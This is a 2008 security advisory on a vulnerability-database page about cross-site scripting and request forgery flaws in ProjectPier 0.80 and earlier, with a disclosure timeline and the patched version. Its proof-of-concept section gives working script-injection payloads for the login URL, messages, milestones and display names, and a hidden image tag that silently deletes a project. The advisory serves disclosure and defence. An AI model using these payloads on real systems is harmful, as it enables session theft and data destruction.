https://cxsecurity.com/issue/WLB-2008120128
ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
| 漏洞ID | 1052348 | 漏洞类型 | |
| 发布时间 | 2008-12-17 | 更新时间 | 2008-12-17 |
 CVE编号
|
CVE-2008-5583
CVE-2008-5584 |
 CNNVD-ID
|
N/A |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
======================================================================
ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Cross Site Request Forgery
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: ProjectPier
Version: <= 0.80
Vendor: http://www.projectpier.org
Description:
ProjectPier is a Free, Open-Source, self-hosted PHP application for
managing tasks, projects and teams through an intuitive web interface.
ProjectPier will help your organization communicate, collaborate and
get things done Its function is similar to commercial
groupware/project management products, but allows the freedom and
scalability of self-hosting. Even better, it will always be free.
--------------
Vulnerability:
--------------
1. The login page is vulnerable to cross site scripting.
2. script code can be embedded into messages.
3. script code can be embedded into milestones.
4. script code can be embedded into a users display name.
5. The application is vulnerable to cross site request forgery.
A project e.g. can be deleted with a simple GET request (see PoC).
Combined with the XSS vulnerabilies, the code can be embedded into
a message - if an admin views it, the browser will send the request
to delete a project without being visible to the admin.
------------
PoC/Exploit:
------------
1.
http://localhost/projectpier/index.php?c=access"><script>alert('xss')</s
cript>&a=login"><script>alert(document.cookie)</script>
2.
create a message with <script>alert(document.cookie)</script>
3.
create a milestone with <script>alert(document.cookie)</script>
4.
set the display name in the profile to <script>alert(document.cookie)</script>
5.
<img src="http://localhost/projectpier/index.php?c=project&a=delete&id=1&acti
ve_project=1"
width="0" height="0">
---------
Solution:
---------
update to version 0.8.0.1 or above.
---------
Timeline:
---------
2007-10-24 - vendor informed
2007-10-24 - vendor responded
2008-02-13 - vendor released new version
2008-02-17 - public disclosure检索漏洞
开始时间
结束时间